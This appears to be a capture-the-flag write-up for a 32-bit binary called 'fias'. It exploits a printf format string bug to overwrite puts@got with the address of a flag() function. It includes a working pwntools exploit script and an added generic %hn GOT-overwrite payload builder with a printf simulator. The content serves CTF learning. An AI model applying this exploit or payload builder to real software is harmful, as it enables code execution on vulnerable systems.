This challenge wasn't supposed to be solved like this when I was discussing it with the author. To see the intended way, check out Finches in PIE. It is similar to this one, except that PIE is enabled.
flag.txt (you need this in the same directory as fias for the local exploit; fias reads the flag once you exploit it)
When you run the program, it asks you for two inputs, and it talks about a canary. I am guessing that you have to leak the canary and overwrite the return address with the first input, then fix the overwritten canary with the leaked canary.
There is a handy function called flag that prints out the flag, so the goal is simply to get execution there.
In say_hi(), first_input is passed straight to printf() as the format string, which gives us a format string vulnerability.
The second input is read with gets(), so it can be used for a stack buffer overflow.
Looking at this, the overflow and the canary are not needed at all: the format string alone can write to puts.got. puts() is called right after printf(&first_input), so if the first input overwrites the GOT entry of puts with the address of flag, that next puts() call lands in flag(). say_hi() never returns, so the canary is never checked. Two things make this work and are worth confirming with checksec before relying on it: the binary is not PIE (the GOT and flag addresses are fixed) and the GOT is writable (no Full RELRO).
```python
#!/usr/bin/python2.7
from pwn import *

isLocal = True
if isLocal:
    p = process("./fias")
else:
    p = remote("188.8.131.52", 34995)

elf = ELF("./fias")
GOT_PUTS = elf.got['puts']    # 0x0804c01c, the writable GOT slot we overwrite
FUNC_FLAG = elf.sym['flag']   # 0x080491d2, where puts() should end up going

p.recvline()
p.recvline()

# first_input is printf's format string and starts at printf argument 6.
# Payload layout:
#   arg 6: &puts@got + 2   high half of the GOT entry
#   arg 7: '@@@@'          dummy word, eaten by the second padding %x
#   arg 8: &puts@got       low half of the GOT entry
# '%.8x' * 4 consumes args 1-4 and prints exactly 32 bytes.
# 12 + 32 + 2008 = 2052 = 0x0804 bytes printed, so the first %hn (arg 6)
# writes 0x0804 to puts@got+2. 2052 + 35278 = 37330 = 0x91d2, so the second
# %hn (arg 8) writes 0x91d2 to puts@got. puts@got is now 0x080491d2 = flag.
p.sendline(p32(GOT_PUTS + 2) + b'@@@@' + p32(GOT_PUTS)
           + b'%.8x' * 4 + b'%.2008x%hn' + b'%.35278x%hn')

p.recvline()
p.recvline()
p.recvline()
print(p.recvline())
```
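The padding values 2008 and 35278 in the script above come from simple arithmetic on the printf byte counter, and it is easy to get them wrong by a few bytes. The following is an added example, not code from the writeup, that generalises that computation: it builds the two-write %hn payload for any target address and value using the same layout (address, dummy word, address, sequential conversions), and then checks it against a small model of the printf directives involved, so the payload can be verified offline before it is sent. It assumes, as the writeup's payload layout implies, that first_input starts at printf argument 6; on a real target that offset is confirmed by sending something like "AAAA%6$x" and looking for 41414141 in the output. The addresses are the ones the writeup reports; struct.pack replaces pwntools so the block runs stand-alone.

```python
import re
import struct

# Addresses reported in the writeup (binary is not PIE, so they are fixed).
GOT_PUTS = 0x0804c01c
FUNC_FLAG = 0x080491d2
# Assumption: first_input is printf argument 6 (inferred from the writeup's
# payload layout, not stated on the page; confirm with "AAAA%6$x" on a target).
FMT_ARG_OFFSET = 6


def p32(x):
    return struct.pack('<I', x & 0xffffffff)


def u32(b):
    return struct.unpack('<I', b)[0]


def build_got_overwrite(target, value, arg_offset):
    """Format string that writes 32-bit `value` to `target` with two %hn writes.

    The string is assumed to start at printf argument `arg_offset` and uses the
    writeup's layout: address, dummy word, address, then sequential conversions
    (no positional $ specifiers). The half with the smaller value is written
    first, because the byte counter that %hn stores only ever grows.
    """
    lo, hi = value & 0xffff, (value >> 16) & 0xffff
    (addr_a, val_a), (addr_b, val_b) = sorted(
        [(target, lo), (target + 2, hi)], key=lambda t: t[1])
    payload = p32(addr_a) + b'@@@@' + p32(addr_b)   # args arg_offset, +1, +2
    if b'%' in payload or b'\n' in payload:
        raise ValueError('address bytes would break the format string or the read')
    written = len(payload)
    fmt = b''
    # Burn args 1 .. arg_offset-2 with a fixed precision so the count stays exact
    # (a 32-bit value never needs more than 8 hex digits).
    for _ in range(arg_offset - 2):
        fmt += b'%.8x'
        written += 8
    for addr, val in ((addr_a, val_a), (addr_b, val_b)):
        pad = (val - written) % 0x10000
        if pad < 8:            # keep precision >= 8 so the output is exactly `pad` bytes
            pad += 0x10000     # %hn only keeps the low 16 bits, so this still lands on val
        fmt += b'%.' + str(pad).encode() + b'x%hn'   # one arg for padding, one for %hn
        written += pad
    return payload + fmt


def simulate_printf(fmt, args, memory):
    """Model of the only directives used here (%.Nx and %hn) over a list of
    32-bit printf arguments. Returns the byte count printf would reach and
    records each %hn as memory[addr] = low 16 bits of the count at that point."""
    count = 0
    arg = 0
    pos = 0
    for m in re.finditer(rb'%(?:\.(\d+))?(x|hn)', fmt):
        count += m.start() - pos           # literal bytes before the directive
        pos = m.end()
        value = args[arg] if arg < len(args) else 0
        arg += 1
        if m.group(2) == b'x':
            prec = int(m.group(1)) if m.group(1) else 0
            count += max(prec, len(b'%x' % value))
        else:
            memory[value] = count & 0xffff
    return count + len(fmt) - pos


def resulting_got_entry(payload, arg_offset):
    """Value puts@got holds after printf(payload). Constructed stack model:
    junk words for args 1..arg_offset-1, then the payload bytes as 32-bit words."""
    junk = [0xdeadbeef] * (arg_offset - 1)
    words = [u32(payload[i:i + 4]) for i in range(0, len(payload) - 3, 4)]
    mem = {}
    simulate_printf(payload, junk + words, mem)
    return mem.get(GOT_PUTS, 0) | (mem.get(GOT_PUTS + 2, 0) << 16)


if __name__ == '__main__':
    payload = build_got_overwrite(GOT_PUTS, FUNC_FLAG, FMT_ARG_OFFSET)
    print(payload)
    print(hex(resulting_got_entry(payload, FMT_ARG_OFFSET)))
```

For the writeup's addresses the builder reproduces the script's payload byte for byte, and the model confirms that puts@got ends up as 0x080491d2. The ordering step matters whenever the low half of the value is larger than the high half, as it is here (0x91d2 > 0x0804): writing them in address order would need the counter to go backwards.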